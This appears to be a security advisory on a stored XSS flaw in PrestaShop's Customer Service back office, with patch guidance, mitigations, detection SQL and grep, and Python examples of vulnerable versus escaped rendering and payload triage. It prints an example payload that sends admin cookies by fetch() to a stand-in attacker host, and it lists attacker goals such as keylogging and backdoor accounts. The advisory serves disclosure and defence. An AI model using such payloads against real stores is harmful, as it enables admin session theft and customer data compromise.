CVE-2026-44212: PrestaShop Stored XSS Targets Back-Office Admins
A critical stored Cross-Site Scripting (XSS) vulnerability has been disclosed in PrestaShop, the widely deployed open-source e-commerce platform, tracked as CVE-2026-44212 with a CVSS score of 9.3 (Critical). The flaw exists in the back-office Customer Service view and allows an unauthenticated external attacker to store malicious JavaScript in the application by submitting the public Contact Us form with a specially crafted email address; the script then executes in the browser of any back-office administrator who opens the resulting Customer Service thread.
The vulnerability is patched in PrestaShop 8.2.6 and 9.1.1. Store operators running earlier versions are exposed.
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-44212 |
| CVSS Score | 9.3 (Critical) |
| CWE Classification | CWE-79 — Improper Neutralization of Input During Web Page Generation (XSS) |
| Affected Software | PrestaShop (open source e-commerce) |
| Affected Versions | < 8.2.6, < 9.1.1 |
| Fixed Versions | 8.2.6, 9.1.1 |
| Attack Vector | Network — unauthenticated attacker submits Contact Us form |
| Authentication Required | None (attacker perspective) |
| User Interaction | Required — back-office admin must view the Customer Service thread |
| In-the-Wild Exploitation | Unknown at time of disclosure |
Technical Background
PrestaShop's Customer Service module aggregates messages from various sources, including submissions from the public-facing Contact Us form. When a customer submits a message, the associated contact data — including the sender's email address — is stored in the database and rendered in the back-office Customer Service view for administrator review.
The vulnerability arises because the email address field from Contact Us submissions is not HTML-escaped before being rendered in the back-office interface. An attacker can craft a malicious email address containing an XSS payload (e.g., attacker@example.com<img src=x onerror="fetch('https://c2.attacker.example/'+document.cookie)">), which is stored in the database and executed in the browser of any administrator who views the associated Customer Service thread. Note that the value still contains an "@", so a loose "looks like an email" check does not stop it; the root cause is that the stored value is written into the admin page without output encoding.
This is a stored (persistent) XSS vulnerability — the payload persists in the database and fires every time an administrator views the affected Customer Service message, without any further action from the attacker.
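To make the bug class concrete, the following is an added example and not PrestaShop's code or anything taken from the advisory: a minimal rendering of a Customer Service row in Python, once with the stored email interpolated raw (the vulnerable pattern) and once HTML-escaped at output (the fix), alongside the loose "@" check that lets the payload through and a strict allow-list check that rejects it. The row data and the payload are constructed for this example; the column names follow the advisory's SQL query.

```python
import html
import re

# Constructed sample threads standing in for rows of ps_customer_thread (column names taken
# from the advisory's SQL query; the values, including the payload, are made up for this example).
SAMPLE_THREADS = [
    {"id_customer_thread": 101, "email": "customer@example.com"},
    {"id_customer_thread": 102,
     "email": "attacker@example.com<img src=x onerror=\"fetch('https://c2.attacker.example/'+document.cookie)\">"},
]


def render_row_vulnerable(thread):
    """The bug class: the stored email is interpolated into the admin page as raw HTML."""
    return f'<tr><td>{thread["id_customer_thread"]}</td><td>{thread["email"]}</td></tr>'


def render_row_hardened(thread):
    """Context-appropriate output encoding: HTML-escape every untrusted value at render time."""
    ident = html.escape(str(thread["id_customer_thread"]))
    email = html.escape(thread["email"], quote=True)  # also neutralises " and ' inside attributes
    return f"<tr><td>{ident}</td><td>{email}</td></tr>"


def naive_email_check(value):
    """The kind of input check that lets the payload through: it does contain an '@'."""
    return "@" in value


# Allow-list validation as a second layer: local@domain, no whitespace, quotes or angle brackets.
STRICT_EMAIL = re.compile(r"^[A-Za-z0-9._%+\-]{1,64}@[A-Za-z0-9\-]+(?:\.[A-Za-z0-9\-]+)+$")


def strict_email_check(value):
    return len(value) <= 254 and STRICT_EMAIL.fullmatch(value) is not None


def renders_active_markup(rendered_html):
    """Crude oracle: a literal <img tag in the emitted HTML means the browser will parse it as markup."""
    return "<img" in rendered_html


if __name__ == "__main__":
    for t in SAMPLE_THREADS:
        print("vulnerable:", render_row_vulnerable(t))
        print("hardened:  ", render_row_hardened(t))
        print("naive check:", naive_email_check(t["email"]), "strict check:", strict_email_check(t["email"]))
```

Output encoding at the rendering site is the fix that closes the bug regardless of how the value got into the database; the strict input check is defence in depth and, on its own, would not protect rows that were stored before it was introduced.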
Attack Flow
1. The attacker submits the PrestaShop Contact Us form with a malicious email address containing an embedded XSS payload
2. PrestaShop stores the submission, including the unsanitized email, in the database as a Customer Service message thread
3. A back-office administrator opens the Customer Service panel to review customer inquiries, a standard daily workflow for store operators
4. The unsanitized email address is rendered into the administrator's page and the embedded JavaScript executes in the admin's browser
5. Payload options include:
- Session cookie theft (admin session hijack); if the admin cookie is flagged HttpOnly, document.cookie will not return it, but the script can still drive the back office as the admin from inside the page
- Actions under the admin's authenticated context (the script runs same-origin, so any anti-CSRF token present in the page is readable to it)
- Keylogging of back-office input fields
- Credential exfiltration via fetch() to an attacker-controlled server
- Creation of backdoor admin accounts
6. The attacker receives the stolen session token or credentials, or benefits from actions the payload already performed, and gains administrative access to the PrestaShop store without knowing any password
Why This Is Critical (CVSS 9.3)
The high CVSS score reflects several compounding factors:
- No authentication required to inject the payload — the Contact Us form is fully public
- Administrative target — the payload executes in an administrator's browser session with full back-office privileges
- Persistent storage — the payload fires on every view, increasing the probability of successful exploitation
- Broad attack surface — Customer Service is a core back-office feature used regularly by store operators
- Full store compromise potential — a hijacked admin session provides access to all customer data, order history, payment configurations, and the ability to inject malicious code into the store's frontend
Affected Versions
The vulnerability affects PrestaShop in the following version ranges:
| Branch | Affected | Patched |
|---|---|---|
| 8.x | < 8.2.6 | 8.2.6+ |
| 9.x | < 9.1.1 | 9.1.1+ |
PrestaShop operators running any 8.x version below 8.2.6, or any 9.x version below 9.1.1, should treat this as an urgent update.
Remediation
Immediate: Update PrestaShop
# Check current PrestaShop version
php bin/console prestashop:version
# Update via Composer (if managing via Composer)
composer update prestashop/prestashop
# Or download the patched release from PrestaShop GitHub
# https://github.com/PrestaShop/PrestaShop/releases
The running version is also declared as the VERSION constant in app/AppKernel.php. On a standard installation, update via the PrestaShop Back-Office > Advanced Parameters > Updates module (1-Click Upgrade) instead, and take a database and file backup before upgrading.
Target versions:
- 8.x stores: Update to 8.2.6 or later
- 9.x stores: Update to 9.1.1 or later
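An added helper, not from the advisory or the PrestaShop project, that applies the affected-version table above: it parses a PrestaShop version string and reports whether the installed release is below the fix for its branch, with an explicit "not covered" result for branches the advisory does not list (such as 1.7.x). The AppKernel.php fragment is constructed, and the assumption that app/AppKernel.php declares the version as a VERSION constant is mine, not something the advisory states.

```python
import re

# Fixed versions per branch, taken from the advisory's affected-version table.
FIXED_BY_BRANCH = {8: (8, 2, 6), 9: (9, 1, 1)}

# Constructed stand-in for the file contents. Assumption (not from the advisory): PrestaShop's
# app/AppKernel.php declares the running version as a `VERSION = '...'` constant.
SAMPLE_APPKERNEL = "class AppKernel extends Kernel\n{\n    public const VERSION = '8.2.5';\n"


def parse_version(text):
    """Return (major, minor, patch) from strings like '8.2.5' or '9.1.0-rc.1'; raise on anything else."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised PrestaShop version: {text!r}")
    return tuple(int(x) for x in m.groups())


def version_from_appkernel(source):
    """Extract the VERSION constant from AppKernel.php source; None if the pattern is absent."""
    m = re.search(r"\bVERSION\s*=\s*'([^']+)'", source)
    return m.group(1) if m else None


def is_affected(version):
    """True if below the fix for its branch, False if patched,
    None if the branch is not covered by the advisory's table (e.g. 1.7.x)."""
    v = parse_version(version)
    fixed = FIXED_BY_BRANCH.get(v[0])
    if fixed is None:
        return None
    return v < fixed


if __name__ == "__main__":
    ver = version_from_appkernel(SAMPLE_APPKERNEL)
    status = {True: "affected", False: "patched", None: "branch not covered by advisory"}[is_affected(ver)]
    print(ver, status)
```

Pre-release suffixes are ignored on purpose: "8.2.6-rc.1" compares as 8.2.6 here, so if you run release candidates, confirm against the actual tag rather than trusting the verdict.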
Interim Mitigations (Pre-Patch)
If immediate patching is not possible:
- Restrict back-office access by IP allowlist: use Nginx/Apache allow/deny rules or a VPN so that only trusted addresses can reach the admin directory (PrestaShop forces the admin folder to be renamed at install, so the path is admin-<suffix> rather than a literal /admin). This limits who can reach the back office; the payload still runs in an allowlisted admin's browser and can act from there.
- Disable the public Contact Us form temporarily if it is not in active use (in PrestaShop 1.7 and later it is provided by the contactform module, under Back-Office > Modules). This stops new payloads from being stored; it does not remove threads already in the database.
- Enable a WAF with XSS filtering rules to intercept malicious Contact Us submissions at the network edge; treat this as best-effort, since encoded or obfuscated payloads can slip past signature rules.
- Review incoming Contact Us submissions at the database level for anomalous email fields before anyone opens them in the back office, since rendering the thread is exactly what triggers the payload.
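For that last point, here is an added triage example, not from the advisory or the PrestaShop project, that works on rows pulled from ps_customer_thread (for instance the output of the SQL query in the Detection section). It goes a step beyond a plain substring match: it decodes URL and HTML-entity encoding before looking for markup, and it short-circuits on well-formed addresses, so an encoded payload is still caught while a legitimate address that happens to contain the substring "script" (description@...) is not flagged. The rows, dates and payloads are constructed.

```python
import html
import re
from urllib.parse import unquote

# Constructed rows standing in for query output over ps_customer_thread
# (id_customer_thread, email, date_add). All values, including the payloads, are made up.
SAMPLE_ROWS = [
    (201, "jane.doe@example.com", "2026-05-01 10:02:11"),
    (202, "attacker@example.com<img src=x onerror=alert(1)>", "2026-05-01 10:05:43"),
    (203, "x@example.com%3Csvg%2Fonload%3Dalert%281%29%3E", "2026-05-01 10:07:00"),  # URL-encoded
    (204, "y@example.com&lt;script&gt;fetch('//c2.attacker.example')&lt;/script&gt;", "2026-05-01 10:08:30"),  # entity-encoded
    (205, "description@example.com", "2026-05-01 10:09:00"),  # contains 'script'; must not be flagged
]

# Shape of a plain address; anything that does not fully match gets a closer look.
PLAIN_EMAIL = re.compile(r"^[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+$")

# Markup signals evaluated after decoding: a tag start, an on* event handler, or a script URL.
SIGNATURES = re.compile(r"<\s*/?\s*[a-z]|\bon[a-z]+\s*=|javascript\s*:", re.IGNORECASE)


def normalise(value):
    """Strip up to three layers of URL and HTML-entity encoding so encoded payloads become visible."""
    prev, cur = None, value
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, html.unescape(unquote(cur))
    return cur


def classify(email):
    """'clean' for a plain address, 'suspicious' if markup shows up after decoding, else 'malformed'."""
    decoded = normalise(email)
    if PLAIN_EMAIL.fullmatch(decoded):
        return "clean"
    return "suspicious" if SIGNATURES.search(decoded) else "malformed"


def triage(rows):
    """Return (id, verdict, raw_email) for every row that is not a plain address."""
    findings = []
    for thread_id, email, _date_add in rows:
        verdict = classify(email)
        if verdict != "clean":
            findings.append((thread_id, verdict, email))
    return findings


if __name__ == "__main__":
    for thread_id, verdict, email in triage(SAMPLE_ROWS):
        print(f"{thread_id}\t{verdict}\t{email}")
```

Treat "malformed" hits as worth a look too: an address that is not a plain email but carries no recognised markup may simply be a typo, or a probe using a technique the signature list does not cover.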
Detection
Review recent Contact Us submissions for suspicious email addresses:
-- Query the PrestaShop database for suspicious email addresses in customer threads
-- (ps_ is the installer's default table prefix; check DB_PREFIX in your configuration if yours differs)
SELECT id_customer_thread, email, date_add
FROM ps_customer_thread
WHERE email REGEXP '<|script|onerror|onload|javascript:'
ORDER BY date_add DESC
LIMIT 50;
Run this from a database client, not by opening threads in the back-office UI, since rendering a thread is what fires the payload. With MySQL's default case-insensitive collation REGEXP also matches mixed-case payloads; the 'script' term will additionally flag legitimate addresses such as description@..., so review hits by hand rather than acting on them automatically.
Check web server access logs for unusual Contact Us form requests:
# Look for XSS markers in requests that touch the contact form
grep -i "onerror\|onload\|javascript:\|<script" /var/log/nginx/access.log | \
grep -i "contact" | tail -50
Note the limitation: the Contact Us form is submitted by POST, and a standard access log records the request line and headers but not the body, so this grep only catches probes that put the payload in a query string. The database query above is the authoritative check; WAF or reverse-proxy logs configured to capture request bodies are where the POST payloads themselves would appear.
Impact Assessment
| Impact Area | Description |
|---|---|
| Admin Session Hijack | Stolen session cookie enables full back-office access without credentials |
| Customer Data Exposure | Admin access exposes all customer PII, order history, payment data |
| Store Defacement | Attacker-controlled admin can modify storefront content and inject malicious JS |
| Payment Skimming | Malicious JS injected via admin access could add checkout skimmers |
| Persistence | Payload fires repeatedly without further attacker interaction |
| Supply Chain Risk | Compromised store could serve malware to customers |
Key Takeaways
- CVE-2026-44212 is a CVSS 9.3 Critical stored XSS in PrestaShop's Customer Service back-office view, triggered by unsanitized Contact Us form submissions
- No authentication required — any internet user can submit the malicious payload via the public contact form
- Update immediately to PrestaShop 8.2.6+ or 9.1.1+ to remediate the vulnerability
- Restrict back-office access by IP as an interim measure if patching is delayed
- Audit recent Customer Service threads for suspicious email addresses with a database query rather than by opening them in the back office; hits may indicate prior exploitation attempts